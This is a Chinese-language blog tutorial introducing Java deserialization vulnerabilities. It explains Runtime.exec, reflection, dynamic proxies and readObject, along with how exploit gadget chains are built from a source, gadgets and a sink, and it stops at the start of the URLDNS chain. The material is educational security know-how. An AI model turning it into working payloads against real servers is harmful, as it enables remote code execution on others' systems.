<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
<meta name="referrer" content="no-referrer" />
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"m1crosoft.site","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="前言2015年，FoxGlove Security安全团队的@breenmachine发布了一篇长博客，里面详细阐述了利用java反序列化和Apache Commons  Collections这一基础类库实现远程命令执行。 该漏洞影响了诸多java web server，同时也开启了各种java反序列漏洞的大门。在此之后，Apache Commons Collections项目组也对存在漏洞的类">
<meta property="og:type" content="article">
<meta property="og:title" content="测试">
<meta property="og:url" content="http://m1crosoft.site/2017/08/06/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%85%A5%E9%97%A8/index.html">
<meta property="og:site_name" content="_ap">
<meta property="og:description" content="前言2015年，FoxGlove Security安全团队的@breenmachine发布了一篇长博客，里面详细阐述了利用java反序列化和Apache Commons  Collections这一基础类库实现远程命令执行。 该漏洞影响了诸多java web server，同时也开启了各种java反序列漏洞的大门。在此之后，Apache Commons Collections项目组也对存在漏洞的类">
<meta property="og:locale">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649450187493-8021bc24-9a40-42be-9571-afbf438c55e3.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649452506422-ffe3a86b-54f3-41d9-8489-dced03874967.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649453099328-a4a1fd94-5c3b-44d6-9d7a-b572e198bf3c.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649535390463-729f32a9-7473-477e-9cee-42d4101e3c88.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649451290579-64fe91f7-a29c-4970-bb09-95b54be08e20.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649451467831-5ded5f0f-e064-4e20-a9fa-89e775c450be.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649451548891-5bbfb75b-d899-477c-ae33-0ded740ff7cf.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649453944051-01afb504-8c35-4e86-83d4-3f061d0a6d2c.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649172784313-862611dd-cbe4-409a-89a5-663cd0da2340.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649454325443-a5b3f4d3-611d-4d4b-909b-d2f935dcaa50.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649174775659-e4d663c3-c4a0-41f2-ad73-0f8180b35592.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649174751093-6b074486-0ca1-41a0-813c-067d550f7be2.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649536422894-29f8c4be-b620-43a1-9c84-70ef83cd62cc.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649348540566-7f56136f-e2f9-4a71-91f2-d1ac3b99ddba.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649348850697-58eb7be1-ff0a-46de-b1e6-f497eca8c727.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649537700103-3e482177-65e2-431b-9bfe-3604e5261286.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649537905913-90de9003-6e32-483d-89b3-8ae64e875247.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649538443627-c356185a-7111-4a4c-824f-1b730f4d7b02.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649539029939-1555f512-07fe-413e-80b1-b4cef4534c69.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649354357798-9ccde84a-3ee6-4890-b07e-536d6e17ff30.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649540651102-cd2912f4-decf-40f6-a0b2-c09dfa2b62e5.png">
<meta property="article:published_time" content="2017-08-06T08:09:49.000Z">
<meta property="article:modified_time" content="2022-08-06T12:24:21.817Z">
<meta property="article:author" content="ap">
<meta property="article:tag" content="学习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649450187493-8021bc24-9a40-42be-9571-afbf438c55e3.png">

<link rel="canonical" href="http://m1crosoft.site/2017/08/06/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%85%A5%E9%97%A8/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>测试 | _ap</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">_ap</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">晓看天色暮看云</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="http://m1crosoft.site/2017/08/06/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%85%A5%E9%97%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/Avatar/ava.jpg">
      <meta itemprop="name" content="ap">
      <meta itemprop="description" content="ap@2022">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="_ap">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          测试
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2017-08-06 16:09:49" itemprop="dateCreated datePublished" datetime="2017-08-06T16:09:49+08:00">2017-08-06</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2022-08-06 20:24:21" itemprop="dateModified" datetime="2022-08-06T20:24:21+08:00">2022-08-06</time>
              </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2017/08/06/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%85%A5%E9%97%A8/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2017/08/06/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%85%A5%E9%97%A8/" itemprop="commentCount"></span>
    </a>
  </span>
  
  <br>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">Symbols count in article: </span>
              <span>15k</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">Reading time &asymp;</span>
              <span>14 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>2015年，FoxGlove Security安全团队的@breenmachine发布了一篇长博客，里面详细阐述了利用java反序列化和Apache Commons  Collections这一基础类库实现远程命令执行。</p>
<p>该漏洞影响了诸多java web server，同时也开启了各种java反序列漏洞的大门。在此之后，Apache Commons Collections项目组也对存在漏洞的类库进行了一定的安全处理，目前存在缺陷的版本是Apache Commons Collections 3.2.1以下。</p>
<h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h3><p>java中执行系统命令使用<code>java.lang.Runtime</code>类的<code>exec</code>方法<br>如下函数可以在macos中弹出计算器</p>
<blockquote>
<p>getRuntime()是Runtime类中的静态方法，使用此方法获取当前java程序的Runtime（即运行时：计算机程序运行需要的代码库，框架，平台等）</p>
</blockquote>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">universalCodeExcution</span><span class="params">()</span> <span class="keyword">throws</span> IOException &#123;</span><br><span class="line">        Runtime.getRuntime().exec(<span class="string">&quot;open -a /System/Applications/Calculator.app&quot;</span>);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<h3 id="java反射"><a href="#java反射" class="headerlink" title="java反射"></a>java反射</h3><h4 id="什么是反射"><a href="#什么是反射" class="headerlink" title="什么是反射"></a>什么是反射</h4><p>一般情况下，我们使用某个类时必定知道它是什么类，是用来做什么的。于是我们直接对这个类用new关键字来进行实例化，之后使用这个类对象进行操作，可以称之为<strong>正射</strong>，如下代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 在程序未运行前就确定了要运行的类</span></span><br><span class="line"><span class="type">User</span> <span class="variable">user</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">User</span>();</span><br><span class="line">user.login();</span><br></pre></td></tr></table></figure>
<p>反射则是在<strong>代码运行的时候通过用户传入等方法指定要运行的类</strong>，如下代码，执行效果与上面代码相同</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">ReflectionTest</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> NoSuchMethodException,</span><br><span class="line">            InvocationTargetException,</span><br><span class="line">            InstantiationException,</span><br><span class="line">            IllegalAccessException, ClassNotFoundException &#123;</span><br><span class="line">        <span class="comment">// 获取用户类</span></span><br><span class="line">        <span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;com.chaitin.reflectionTest.UserImpl&quot;</span>);</span><br><span class="line">        <span class="comment">// 获取用户类的login方法，第一个参数是方法名，第二个参数是方法的参数类型数组</span></span><br><span class="line">        <span class="type">Method</span> <span class="variable">userLogin</span> <span class="operator">=</span> c.getMethod(<span class="string">&quot;login&quot;</span>,  <span class="literal">null</span>);</span><br><span class="line">        <span class="comment">// 设置方法为可访问</span></span><br><span class="line">        userLogin.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="comment">// 获取用户类的构造函数</span></span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">userConstructor</span> <span class="operator">=</span> c.getConstructor();</span><br><span class="line">        <span class="comment">// 使用构造函数实例化一个用户对象</span></span><br><span class="line">        <span class="type">Object</span> <span class="variable">obj</span> <span class="operator">=</span> userConstructor.newInstance();</span><br><span class="line">        <span class="comment">// 调用用户对象的obj方法</span></span><br><span class="line">        userLogin.invoke(obj);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h4 id="为什么要反射"><a href="#为什么要反射" class="headerlink" title="为什么要反射"></a>为什么要反射</h4><p>如果代码里有很多个类，我们并不能确定用户想要的是哪个类，那么可以使用反射功能，让代码更加灵活，能够在运行的时候根据用户的行为来确定对象类型</p>
<h4 id="通过反射获取类对象"><a href="#通过反射获取类对象" class="headerlink" title="通过反射获取类对象"></a>通过反射获取类对象</h4><p>java提供了三种方法获取类</p>
<ol>
<li>使用<code>Class.forName()</code>方法，如上面代码，当知道类的绝对路径时可以使用</li>
<li>使用<code>&lt;Class&gt;.class</code>方法， 只适合在编译前就知道操作的Class</li>
<li>使用类对象的<code>getClass()</code>方法</li>
</ol>
<h4 id="通过反射创建类对象"><a href="#通过反射创建类对象" class="headerlink" title="通过反射创建类对象"></a>通过反射创建类对象</h4><p>现在我们有了一个类对象<code>Class c = UserImpl.getClass();</code><br>java提供两种方式创建user的对象实例</p>
<ol>
<li>通过 Class 对象的<code>newInstance()</code>方法，此方法只能调用类的默认无参构造方法</li>
<li>通过 Constructor 对象的 <code>newInstance()</code> 方法，此方式能够选择特定的构造方法</li>
</ol>
<h4 id="获取类属性"><a href="#获取类属性" class="headerlink" title="获取类属性"></a>获取类属性</h4><p>我们先看看如何通过Class实例获取字段信息。Class类提供了以下几个方法来获取属性：</p>
<ul>
<li>Field getField(name)：根据字段名获取某个public的field（包括父类）</li>
<li>Field getDeclaredField(name)：根据字段名获取当前类的某个field（不包括父类），注意该方法可以获取私有或者保护类型的属性</li>
<li>Field[] getFields()：获取所有public的field（包括父类）</li>
<li>Field[] getDeclaredFields()：获取当前类的所有field（不包括父类）注意该方法可以获取私有或者保护类型的属性</li>
</ul>
<h4 id="获取对象方法"><a href="#获取对象方法" class="headerlink" title="获取对象方法"></a>获取对象方法</h4><p>同样的，可以通过Class实例获取所有Method信息。Class类提供了以下几个方法来获取Method：</p>
<ul>
<li>Method getMethod(name, Class…)：获取某个public的Method（包括父类）</li>
<li>Method getDeclaredMethod(name, Class…)：获取当前类的某个Method（不包括父类）</li>
<li>Method[] getMethods()：获取所有public的Method（包括父类）</li>
<li>Method[] getDeclaredMethods()：获取当前类的所有Method（不包括父类）</li>
</ul>
<h4 id="动态代理"><a href="#动态代理" class="headerlink" title="动态代理"></a>动态代理</h4><p>我们知道代理是一个中介，能帮我们完成我们想要的事情，比如我们要记录用户登录日志，登录功能在用户类里，我们如果在用户类里的登录功能增加日志逻辑就太繁琐，于是我们可以创建一个代理类，在里面实现我们想要的日志等功能，使用的时候只需要丢给代理一个用户，对他说帮我处理记录日志的事，代理就会帮我们处理好。</p>
<p>先看看静态代理怎么做</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">UserProxy</span> <span class="keyword">implements</span> <span class="title class_">IUser</span>&#123;</span><br><span class="line">    IUser user;</span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">UserProxy</span> <span class="params">(IUser user)</span>&#123;</span><br><span class="line">        <span class="built_in">this</span>.user = user;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     *  静态代理的问题在于如果接口声明的方法很多那么要一个个去写实现</span></span><br><span class="line"><span class="comment">     *  代理类里面是不知道外面调用了什么方法，所以没法依靠反射获取方法来完成动作</span></span><br><span class="line"><span class="comment">     *  那么就用到了jdk自带的动态代理</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">login</span><span class="params">()</span> &#123;</span><br><span class="line">        user.login();</span><br><span class="line">        System.out.println(<span class="string">&quot;日志代理：登录时间:&quot;</span> + <span class="keyword">new</span> <span class="title class_">SimpleDateFormat</span>(<span class="string">&quot;yyyy-MM-dd HH:mm:ss&quot;</span>).format(<span class="keyword">new</span> <span class="title class_">Date</span>()));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到静态代理类里调用了用户登录功能后实现了日志功能，使用时只需要叫用户代理帮我们做登录，就可以实现登录日志记录</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">IUser user= <span class="keyword">new</span> <span class="title class_">UserImpl</span>();</span><br><span class="line"><span class="comment">// 静态代理</span></span><br><span class="line"><span class="type">IUser</span> <span class="variable">userProxy</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">UserProxy</span>(user);</span><br><span class="line">userProxy.login();</span><br></pre></td></tr></table></figure>
<p>缺陷我们也发现了，就是一旦想要给更多方法如注销，注册等功能提供日志，那么每个方法都需要在代理类里实现一遍，这样就不方便<br>java为此提供了动态代理，如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 动态代理 不需要创建单独的代理类 但是仍然需要创建调用处理器类</span></span><br><span class="line"><span class="type">InvocationHandler</span> <span class="variable">userInvocationHandler</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">UserInvocationHandler</span>(user);</span><br><span class="line"><span class="comment">// 类加载器，要代理的接口，要做的事情（调用处理器）</span></span><br><span class="line"><span class="comment">// 默认会返回一个Object对象，我们需要将其转为IUser</span></span><br><span class="line"><span class="type">IUser</span> <span class="variable">userDynamicProxy</span> <span class="operator">=</span> (IUser) Proxy.newProxyInstance(user.getClass().getClassLoader(), user.getClass().getInterfaces(), userInvocationHandler);</span><br><span class="line"><span class="comment">// 一旦调用动态代理，那么就自动执行invoke方法</span></span><br><span class="line">userDynamicProxy.login();</span><br></pre></td></tr></table></figure>
<p>调用处理器InvocationHandler中，只实现了一次日志记录逻辑，但是它能根据反射得到外面用了什么方法，并在执行该方法后实现记录日志的逻辑，<strong>注意一旦动态代理被调用，会自动执行调用处理器里的invoke方法</strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.chaitin.proxy;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationHandler;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"><span class="keyword">import</span> java.text.SimpleDateFormat;</span><br><span class="line"><span class="keyword">import</span> java.util.Date;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">UserInvocationHandler</span> <span class="keyword">implements</span> <span class="title class_">InvocationHandler</span> &#123;</span><br><span class="line">    IUser user;</span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">UserInvocationHandler</span><span class="params">(IUser user)</span>&#123;</span><br><span class="line">        <span class="built_in">this</span>.user = user;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//反射调用，java底层实现，在外头写里面就能知道调用了啥,完了对着代理的对象调用捕获的方法</span></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> Object <span class="title function_">invoke</span><span class="params">(Object proxy, Method method, Object[] args)</span> <span class="keyword">throws</span> Throwable &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;日志动态代理：登录时间:&quot;</span> + <span class="keyword">new</span> <span class="title class_">SimpleDateFormat</span>(<span class="string">&quot;yyyy-MM-dd HH:mm:ss&quot;</span>).format(<span class="keyword">new</span> <span class="title class_">Date</span>()));</span><br><span class="line">        method.invoke(user, args);</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到实现的效果是相同的，但是在进行开发的时候动态代理能够为我们偷很多懒，也能使代码更加优雅<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649450187493-8021bc24-9a40-42be-9571-afbf438c55e3.png" alt="image.png"></p>
<h3 id="java序列化和反序列化"><a href="#java序列化和反序列化" class="headerlink" title="java序列化和反序列化"></a>java序列化和反序列化</h3><h4 id="反序列化的操作函数"><a href="#反序列化的操作函数" class="headerlink" title="反序列化的操作函数"></a>反序列化的操作函数</h4><p>java.io.ObjectOutputStream类中的<code>writeObject( )</code>方法可以实现Java序列化。<br>java.io.ObjectInputStream类中的<code>readObject( )</code>方法可以实现Java反序列化。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.chaitin;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.FileInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Unserialization</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">unserialize</span><span class="params">(String fileName)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException&#123;</span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(fileName));</span><br><span class="line">        <span class="type">Object</span> <span class="variable">obj</span> <span class="operator">=</span> ois.readObject();</span><br><span class="line">        <span class="keyword">return</span> obj;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        unserialize(<span class="string">&quot;ser.bin&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h4 id="反序列化漏洞成因"><a href="#反序列化漏洞成因" class="headerlink" title="反序列化漏洞成因"></a>反序列化漏洞成因</h4><p>Java中间件通常通过网络接收客户端发送的序列化数据，而在服务端对序列化数据进行反序列化时，会调用被序列化对象的<code>readObject( )</code>方法。而在Java中如果重写了某个类的方法，就会优先调用经过修改后的方法。如果某个对象重写了<code>readObject( )</code>方法，且在方法中能够执行任意代码，那服务端在进行反序列时，也会执行相应代码。</p>
<h4 id="怎么找反序列化利用链"><a href="#怎么找反序列化利用链" class="headerlink" title="怎么找反序列化利用链"></a>怎么找反序列化利用链</h4><p>反序列化利用链由入口点<strong>source</strong>（一般就是个readObject方法），连接入口点和执行点点多个类<strong>gadget</strong>，执行点<strong>sink</strong>（一般是代码执行，jdni注入，写文件等）组成<br>需要满足的条件：</p>
<ul>
<li>gadget链上的类能序列化（实现了Serializable接口）</li>
<li>入口类重写了readObject，<strong>里面带有危险的点&#x2F;调用了其他类的危险方法&#x2F;调用了其他类的方法，方法中又调用了其他类的危险方法…</strong></li>
<li>入口类能够接受的类型比较宽泛，方便我们找到更多的利用链</li>
</ul>
<p>我们会发现<strong>java.util.HashMap</strong>就是一个比较好的入口类，他能接受任意类型，能序列化，也重写了readObject方法<br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649452506422-ffe3a86b-54f3-41d9-8489-dced03874967.png" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2022/png/22346635/1649453099328-a4a1fd94-5c3b-44d6-9d7a-b572e198bf3c.png" alt="image.png"></p>
<h2 id="java反序列化-URLDNS链"><a href="#java反序列化-URLDNS链" class="headerlink" title="java反序列化-URLDNS链"></a>java反序列化-URLDNS链</h2><p>这是个最简单的链，没什么危害，链子不依赖外部库，只能对特定地址发起DNS请求，可以用来验证是否存在反序列化漏洞</p>
